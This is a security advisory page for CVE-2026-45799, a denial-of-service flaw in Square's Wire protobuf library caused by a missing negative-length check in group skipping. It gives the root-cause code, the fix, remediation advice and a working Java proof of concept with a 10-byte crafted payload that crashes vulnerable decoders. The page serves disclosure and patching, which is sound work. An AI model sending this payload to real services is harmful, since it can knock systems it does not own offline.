Skip to main content

Square Wire CVE-2026-45799

HIGH
Improper Validation of Array Index (CWE-129)
2026-05-19 https://github.com/square/wire GHSA-7xpr-hc2w-34m9
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 19, 2026 - 20:16 vuln.today
Analysis Generated
May 19, 2026 - 20:16 vuln.today

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 3 maven packages depend on com.squareup.wire:wire-runtime (2 direct, 1 indirect)
  • 91 maven packages depend on com.squareup.wire:wire-runtime-jvm (21 direct, 70 indirect)

Ecosystem-wide dependent count for version 7.0.0-alpha01 and other introduced versions.

DescriptionGitHub Advisory

CVE-2026-45799

Maintainer summary

Wire's protobuf group-skipping logic did not reject negative lengths before skipping a length-delimited field inside a group. A crafted protobuf payload could cause Wire to throw an unchecked runtime exception during decoding instead of the documented IOException / ProtocolException failure path.

This can crash services that decode untrusted protobuf payloads and only handle Wire's documented checked decoding failures.

Affected artifacts

com.squareup.wire:wire-runtime

Affected versions: vulnerable releases before 6.3.0.

Patched versions: 6.3.0 and later.

Users should upgrade to com.squareup.wire:wire-runtime:6.3.0 or later.

com.squareup.wire:wire-runtime-jvm

Affected versions: vulnerable legacy releases, including 5.3.1 and 5.3.3.

Patched versions: none.

com.squareup.wire:wire-runtime-jvm is a discontinued legacy artifact and will not receive a patched release. Users should migrate to com.squareup.wire:wire-runtime:6.3.0 or later.

Wire 7 alpha releases

The fix has been merged to master and will be included in the next Wire 7 alpha release. Until that release is available, Wire 7 alpha users should avoid decoding untrusted protobuf payloads with affected alpha versions or build from a commit containing the fix.

Fix

The issue is fixed in Wire 6.3.0.

The fix rejects negative lengths while skipping groups and throws ProtocolException instead of allowing the reader to move to an invalid position and later throw an unchecked runtime exception.

Credit

Reported by @TrekLaps.

Technical details

The following technical details are based on the original report, updated by the maintainers to reflect the assigned CVE, the supported fixed artifact, and the discontinued status of com.squareup.wire:wire-runtime-jvm.

ByteArrayProtoReader32.skipGroup() in wire-runtime did not validate that a LENGTH_DELIMITED field's length is non-negative before calling skip(). A crafted protobuf varint encodes -128 as a signed Int. When skip(-128) runs, the internal position counter underflows to an invalid negative position. The next readByte() accesses the source with that negative position, throwing ArrayIndexOutOfBoundsException, a RuntimeException that escapes Wire's documented IOException boundary and can crash the request handler.

ProtoAdapter.decode(byte[]) is declared to throw IOException. Callers following the documented API may catch only IOException, so unchecked runtime exceptions from malformed input can escape the expected error boundary.

The originally confirmed vulnerable legacy versions include 5.3.1 and 5.3.3 for the discontinued com.squareup.wire:wire-runtime-jvm coordinate. The supported replacement coordinate is com.squareup.wire:wire-runtime, fixed in version 6.3.0.

Root cause

In the originally reported vulnerable code path, ByteArrayProtoReader32.skipGroup() read the length as a signed Int and used it without validating that it was non-negative:

kotlin
STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32() // returns signed Int and can be negative
  skip(length)                        // no negative check
}

The internal skip() implementation then accepted the negative count because the computed position was not greater than the limit:

kotlin
private fun skip(byteCount: Int) {
  val newPos = pos + byteCount        // for example, 7 + (-128) = -121
  if (newPos > limit) throw EOFException()
  pos = newPos                        // pos = -121
}

The next read could then index the source with the invalid negative position:

kotlin
private fun readByte(): Byte {
  if (pos == limit) throw EOFException()
  return source[pos++]                // source[-121] throws ArrayIndexOutOfBoundsException
}

Wire already rejected negative lengths in normal length-delimited field decoding. The same validation was missing from group-skipping code.

The fix adds this validation when skipping groups:

kotlin
STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32()
  if (length < 0) throw ProtocolException("Negative length: $length...")
  skip(length)
}

The fix was applied to both ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup().

Reproduction

The following reproduction was provided for vulnerable legacy wire-runtime-jvm releases such as 5.3.1 and 5.3.3:

bash
curl -sL https://repo1.maven.org/maven2/com/squareup/wire/wire-runtime-jvm/5.3.3/wire-runtime-jvm-5.3.3.jar -o wire.jar
curl -sL https://repo1.maven.org/maven2/com/squareup/okio/okio-jvm/3.9.1/okio-jvm-3.9.1.jar -o okio.jar
curl -sL https://repo1.maven.org/maven2/org/jetbrains/kotlin/kotlin-stdlib/2.1.0/kotlin-stdlib-2.1.0.jar -o stdlib.jar
java
// WirePoc.java
import com.squareup.wire.AnyMessage;

public class WirePoc {
  public static void main(String[] args) throws Exception {
    byte[] payload = new byte[] {
      (byte) 0x9B, 0x06,                                          // field 99, START_GROUP
      0x0A,                                                       // field 1, LENGTH_DELIMITED
      (byte) 0x80, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF, 0x0F,   // varint = -128
      (byte) 0x9C, 0x06                                           // field 99, END_GROUP
    };

    AnyMessage.ADAPTER.decode(payload);
  }
}
bash
javac -cp "wire.jar:okio.jar:stdlib.jar" WirePoc.java
java -cp ".:wire.jar:okio.jar:stdlib.jar" WirePoc

Observed output on vulnerable versions:

text
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index -120 out of bounds for length 10
    at com.squareup.wire.ByteArrayProtoReader32.readByte(ByteArrayProtoReader32.kt:448)
    at com.squareup.wire.ByteArrayProtoReader32.internalReadVarint32(ByteArrayProtoReader32.kt:294)
    at com.squareup.wire.ByteArrayProtoReader32.skipGroup(ByteArrayProtoReader32.kt:209)
    at com.squareup.wire.ByteArrayProtoReader32.nextTag(ByteArrayProtoReader32.kt:156)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:150)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:88)
    at com.squareup.wire.ProtoAdapter.decode(ProtoAdapter.kt:468)
    at WirePoc.main(WirePoc.java:10)

With the fix, the same payload is rejected with ProtocolException.

Why this can affect any Wire-decoding service

skipGroup() is called for any unknown field with wire type 3. An attacker can send an unknown field, such as field 99, with wire type START_GROUP. The decoder skips it via skipGroup() regardless of which message type the service uses, so no schema knowledge is required.

Payload:

text
9b060a80ffffff0f9c06

Payload breakdown:

text
0x9B 0x06                 field 99, wire type 3 (START_GROUP)
0x0A                      field 1, wire type 2 (LENGTH_DELIMITED) inside group
0x80 0xFF 0xFF 0xFF 0x0F  5-byte varint = -128 as signed Int
0x9C 0x06                 field 99, END_GROUP

AnalysisAI

Denial of service in Square Wire protobuf library (com.squareup.wire:wire-runtime before 6.3.0) allows remote unauthenticated attackers to crash any service that decodes untrusted protobuf payloads by sending a 10-byte crafted message. The flaw stems from missing negative-length validation in skipGroup(), causing an unchecked ArrayIndexOutOfBoundsException to escape Wire's documented IOException boundary. No public exploit identified at time of analysis, though the GitHub advisory includes a full reproduction payload and Java PoC code.

Technical ContextAI

Wire is Square's Kotlin/Java protocol buffers library widely used for gRPC and protobuf-based service communication on JVM and Android. The root cause is CWE-129 (Improper Validation of Array Index): ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup() read a length-delimited field's length as a signed Int via internalReadVarint32() without checking for negative values before calling skip(). A crafted varint encoding -128 (bytes 0x80 0xFF 0xFF 0xFF 0x0F) causes the internal position counter to underflow (e.g., pos = 7 + (-128) = -121), and the subsequent readByte() indexes the backing array with the negative position, throwing ArrayIndexOutOfBoundsException - a RuntimeException not caught by callers following the documented IOException contract of ProtoAdapter.decode(). Wire already validated negative lengths on normal length-delimited field decoding; the same check was missing only in group-skipping logic. Because skipGroup() is invoked for any unknown field with wire type 3 (START_GROUP), exploitation requires no schema knowledge of the target message type.

RemediationAI

Vendor-released patch: upgrade com.squareup.wire:wire-runtime to 6.3.0 or later, which adds the missing negative-length check in both ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup() (see PRs https://github.com/square/wire/pull/3595 and https://github.com/square/wire/pull/3597). For Wire 7 alpha users, upgrade to 7.0.0-alpha03 once available or build from a master commit containing the fix. Users still on the discontinued com.squareup.wire:wire-runtime-jvm (including 5.3.1 and 5.3.3) must migrate coordinate to com.squareup.wire:wire-runtime:6.3.0 since no backport will be issued. As a compensating control until upgrade, wrap ProtoAdapter.decode() calls in a broader catch block for RuntimeException (not just IOException) to convert crashes into handled errors, accepting the trade-off that this masks other genuine runtime bugs; alternatively restrict protobuf decoding endpoints to authenticated peers or place a size/shape-validating proxy in front of decoders to reject payloads containing unknown group fields, at the cost of breaking legitimate forward-compatibility use of unknown fields.

More in Java

View all
CVE-2012-4681 CRITICAL POC
9.8 Aug 28

Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m

CVE-2015-7450 CRITICAL POC
9.8 Jan 02

Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti

CVE-2013-2465 CRITICAL POC
9.8 Jun 18

Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent

CVE-2011-3544 CRITICAL POC
9.8 Oct 19

Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug

CVE-2010-1871 HIGH POC
8.8 Aug 05

JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to

CVE-2012-1723 CRITICAL POC
9.8 Jun 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up

CVE-2013-0422 CRITICAL POC
9.8 Jan 10

Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using

CVE-2012-0507 CRITICAL POC
9.8 Jun 07

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up

CVE-2015-4852 CRITICAL POC
9.8 Nov 18

The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers

CVE-2012-5076 CRITICAL POC
9.8 Oct 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow

CVE-2017-3066 CRITICAL POC
9.8 Apr 27

Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla

CVE-2012-0391 CRITICAL POC
9.8 Jan 08

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during

Share

CVE-2026-45799 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy